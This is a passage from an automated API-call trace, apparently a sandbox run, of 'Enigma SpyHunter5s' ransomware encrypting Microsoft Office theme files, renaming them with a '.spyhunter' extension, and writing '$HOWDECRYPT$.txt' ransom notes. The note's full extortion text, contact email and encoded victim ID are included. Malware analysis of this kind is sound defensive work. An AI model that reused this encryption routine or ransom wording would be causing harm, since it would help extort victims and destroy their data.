Shared\\THEMES14\\COMPASS\\PREVIEW.GIF.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif.spyhunter")) returned 1 [0090.403] GetProcessHeap () returned 0x2c0000 [0090.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0090.404] GetProcessHeap () returned 0x2c0000 [0090.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0090.405] GetProcessHeap () returned 0x2c0000 [0090.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x375350 | out: hHeap=0x2c0000) returned 1 [0090.405] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd48 | out: pbBuffer=0x270fd48) returned 1 [0090.405] GetProcessHeap () returned 0x2c0000 [0090.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0090.405] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x270fd40*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x270fd40*=0x30) returned 1 [0090.405] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0090.424] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 80 [0090.424] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0090.424] GetProcessHeap () returned 0x2c0000 [0090.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x340fe8 [0090.425] ReadFile (in: hFile=0x17c, lpBuffer=0x340fe8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fd04, lpOverlapped=0x0 | out: lpBuffer=0x340fe8*, lpNumberOfBytesRead=0x270fd04*=0xf75, lpOverlapped=0x0) returned 1 [0090.440] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffff08b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.440] WriteFile (in: hFile=0x17c, lpBuffer=0x340fe8*, nNumberOfBytesToWrite=0xf75, lpNumberOfBytesWritten=0x270fd04, lpOverlapped=0x0 | out: lpBuffer=0x340fe8*, lpNumberOfBytesWritten=0x270fd04*=0xf75, lpOverlapped=0x0) returned 1 [0090.440] GetProcessHeap () returned 0x2c0000 [0090.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340fe8 | out: hHeap=0x2c0000) returned 1 [0090.440] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.441] WriteFile (in: hFile=0x17c, lpBuffer=0x270fd44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fd04, lpOverlapped=0x0 | out: lpBuffer=0x270fd44*, lpNumberOfBytesWritten=0x270fd04*=0x4, lpOverlapped=0x0) returned 1 [0090.441] WriteFile (in: hFile=0x17c, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fd04, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x270fd04*=0x30, lpOverlapped=0x0) returned 1 [0090.441] CloseHandle (hObject=0x17c) returned 1 [0090.478] GetProcessHeap () returned 0x2c0000 [0090.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x396830 [0090.479] wnsprintfW (in: pszDest=0x396830, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF.spyhunter") returned 90 [0090.479] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif.spyhunter")) returned 1 [0090.480] GetProcessHeap () returned 0x2c0000 [0090.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x396830 | out: hHeap=0x2c0000) returned 1 [0090.480] GetProcessHeap () returned 0x2c0000 [0090.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0090.480] GetProcessHeap () returned 0x2c0000 [0090.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x345288 | out: hHeap=0x2c0000) returned 1 [0090.480] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0090.480] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0090.480] WriteFile (in: hFile=0x178, lpBuffer=0x270fc77*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fda0, lpOverlapped=0x0 | out: lpBuffer=0x270fc77*, lpNumberOfBytesWritten=0x270fda0*=0x127, lpOverlapped=0x0) returned 1 [0090.481] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0090.481] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fda0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fda0*=0x2ac, lpOverlapped=0x0) returned 1 [0090.481] CloseHandle (hObject=0x178) returned 1 [0090.482] GetProcessHeap () returned 0x2c0000 [0090.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3412d0 | out: hHeap=0x2c0000) returned 1 [0090.482] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd40 | out: pbBuffer=0x270fd40) returned 1 [0090.482] GetProcessHeap () returned 0x2c0000 [0090.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0090.482] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x270fd38*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x270fd38*=0x30) returned 1 [0090.482] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0090.482] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 76 [0090.482] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0090.482] GetProcessHeap () returned 0x2c0000 [0090.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x37f868 [0090.482] ReadFile (in: hFile=0x178, lpBuffer=0x37f868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fcfc, lpOverlapped=0x0 | out: lpBuffer=0x37f868*, lpNumberOfBytesRead=0x270fcfc*=0x2800, lpOverlapped=0x0) returned 1 [0090.485] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.485] WriteFile (in: hFile=0x178, lpBuffer=0x37f868*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fcfc, lpOverlapped=0x0 | out: lpBuffer=0x37f868*, lpNumberOfBytesWritten=0x270fcfc*=0x2800, lpOverlapped=0x0) returned 1 [0090.485] GetProcessHeap () returned 0x2c0000 [0090.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37f868 | out: hHeap=0x2c0000) returned 1 [0090.485] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.485] WriteFile (in: hFile=0x178, lpBuffer=0x270fd3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fcfc, lpOverlapped=0x0 | out: lpBuffer=0x270fd3c*, lpNumberOfBytesWritten=0x270fcfc*=0x4, lpOverlapped=0x0) returned 1 [0090.485] WriteFile (in: hFile=0x178, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fcfc, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x270fcfc*=0x30, lpOverlapped=0x0) returned 1 [0090.485] CloseHandle (hObject=0x178) returned 1 [0090.486] GetProcessHeap () returned 0x2c0000 [0090.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x396830 [0090.487] wnsprintfW (in: pszDest=0x396830, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG.spyhunter") returned 86 [0090.487] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png.spyhunter")) returned 1 [0090.565] GetProcessHeap () returned 0x2c0000 [0090.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x396830 | out: hHeap=0x2c0000) returned 1 [0090.565] GetProcessHeap () returned 0x2c0000 [0090.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0090.565] GetProcessHeap () returned 0x2c0000 [0090.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x375268 | out: hHeap=0x2c0000) returned 1 [0090.566] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0090.570] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0090.570] WriteFile (in: hFile=0x15c, lpBuffer=0x270fc6f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fd98, lpOverlapped=0x0 | out: lpBuffer=0x270fc6f*, lpNumberOfBytesWritten=0x270fd98*=0x127, lpOverlapped=0x0) returned 1 [0090.571] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0090.571] WriteFile (in: hFile=0x15c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fd98, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fd98*=0x2ac, lpOverlapped=0x0) returned 1 [0090.571] CloseHandle (hObject=0x15c) returned 1 [0090.572] GetProcessHeap () returned 0x2c0000 [0090.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x354ce8 | out: hHeap=0x2c0000) returned 1 [0090.572] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd38 | out: pbBuffer=0x270fd38) returned 1 [0090.572] GetProcessHeap () returned 0x2c0000 [0090.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0090.572] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x270fd30*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x270fd30*=0x30) returned 1 [0090.572] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0090.573] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 79 [0090.573] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0090.573] GetProcessHeap () returned 0x2c0000 [0090.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x376930 [0090.573] ReadFile (in: hFile=0x15c, lpBuffer=0x376930, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fcf4, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesRead=0x270fcf4*=0x4d0, lpOverlapped=0x0) returned 1 [0090.606] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffb30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.606] WriteFile (in: hFile=0x15c, lpBuffer=0x376930*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x270fcf4, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesWritten=0x270fcf4*=0x4d0, lpOverlapped=0x0) returned 1 [0090.606] GetProcessHeap () returned 0x2c0000 [0090.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x376930 | out: hHeap=0x2c0000) returned 1 [0090.606] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.606] WriteFile (in: hFile=0x15c, lpBuffer=0x270fd34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fcf4, lpOverlapped=0x0 | out: lpBuffer=0x270fd34*, lpNumberOfBytesWritten=0x270fcf4*=0x4, lpOverlapped=0x0) returned 1 [0090.606] WriteFile (in: hFile=0x15c, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fcf4, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x270fcf4*=0x30, lpOverlapped=0x0) returned 1 [0090.606] CloseHandle (hObject=0x15c) returned 1 [0090.678] GetProcessHeap () returned 0x2c0000 [0090.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.678] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF.spyhunter") returned 89 [0090.678] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif.spyhunter")) returned 1 [0090.679] GetProcessHeap () returned 0x2c0000 [0090.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0090.679] GetProcessHeap () returned 0x2c0000 [0090.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0090.679] GetProcessHeap () returned 0x2c0000 [0090.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37fdf0 | out: hHeap=0x2c0000) returned 1 [0090.679] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd30 | out: pbBuffer=0x270fd30) returned 1 [0090.679] GetProcessHeap () returned 0x2c0000 [0090.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0090.679] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x270fd28*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x270fd28*=0x30) returned 1 [0090.679] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\network.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0090.696] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF") returned 79 [0090.696] StrStrW (lpFirst="NETWORK.INF", lpSrch=".txt") returned 0x0 [0090.696] GetProcessHeap () returned 0x2c0000 [0090.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x34a078 [0090.696] ReadFile (in: hFile=0xcc, lpBuffer=0x34a078, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fcec, lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesRead=0x270fcec*=0x249, lpOverlapped=0x0) returned 1 [0090.697] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xfffffdb7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.697] WriteFile (in: hFile=0xcc, lpBuffer=0x34a078*, nNumberOfBytesToWrite=0x249, lpNumberOfBytesWritten=0x270fcec, lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesWritten=0x270fcec*=0x249, lpOverlapped=0x0) returned 1 [0090.698] GetProcessHeap () returned 0x2c0000 [0090.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a078 | out: hHeap=0x2c0000) returned 1 [0090.698] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.698] WriteFile (in: hFile=0xcc, lpBuffer=0x270fd2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fcec, lpOverlapped=0x0 | out: lpBuffer=0x270fd2c*, lpNumberOfBytesWritten=0x270fcec*=0x4, lpOverlapped=0x0) returned 1 [0090.698] WriteFile (in: hFile=0xcc, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fcec, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x270fcec*=0x30, lpOverlapped=0x0) returned 1 [0090.698] CloseHandle (hObject=0xcc) returned 1 [0090.699] GetProcessHeap () returned 0x2c0000 [0090.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0090.699] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF.spyhunter") returned 89 [0090.699] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\network.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\network.inf.spyhunter")) returned 1 [0090.893] GetProcessHeap () returned 0x2c0000 [0090.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0090.896] GetProcessHeap () returned 0x2c0000 [0090.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0090.896] GetProcessHeap () returned 0x2c0000 [0090.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x380448 | out: hHeap=0x2c0000) returned 1 [0090.896] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd30 | out: pbBuffer=0x270fd30) returned 1 [0090.896] GetProcessHeap () returned 0x2c0000 [0090.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0090.896] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x270fd28*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x270fd28*=0x30) returned 1 [0090.896] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\sky.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0090.896] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.INF") returned 71 [0090.896] StrStrW (lpFirst="SKY.INF", lpSrch=".txt") returned 0x0 [0090.896] GetProcessHeap () returned 0x2c0000 [0090.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x347830 [0090.897] ReadFile (in: hFile=0xcc, lpBuffer=0x347830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fcec, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesRead=0x270fcec*=0x1bc, lpOverlapped=0x0) returned 1 [0090.898] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xfffffe44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.898] WriteFile (in: hFile=0xcc, lpBuffer=0x347830*, nNumberOfBytesToWrite=0x1bc, lpNumberOfBytesWritten=0x270fcec, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesWritten=0x270fcec*=0x1bc, lpOverlapped=0x0) returned 1 [0090.898] GetProcessHeap () returned 0x2c0000 [0090.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x347830 | out: hHeap=0x2c0000) returned 1 [0090.898] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.898] WriteFile (in: hFile=0xcc, lpBuffer=0x270fd2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fcec, lpOverlapped=0x0 | out: lpBuffer=0x270fd2c*, lpNumberOfBytesWritten=0x270fcec*=0x4, lpOverlapped=0x0) returned 1 [0090.898] WriteFile (in: hFile=0xcc, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fcec, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x270fcec*=0x30, lpOverlapped=0x0) returned 1 [0090.899] CloseHandle (hObject=0xcc) returned 1 [0090.899] GetProcessHeap () returned 0x2c0000 [0090.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0090.900] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.INF.spyhunter") returned 81 [0090.900] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\sky.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.INF.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\sky.inf.spyhunter")) returned 1 [0090.950] GetProcessHeap () returned 0x2c0000 [0090.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0090.951] GetProcessHeap () returned 0x2c0000 [0090.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0090.951] GetProcessHeap () returned 0x2c0000 [0090.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 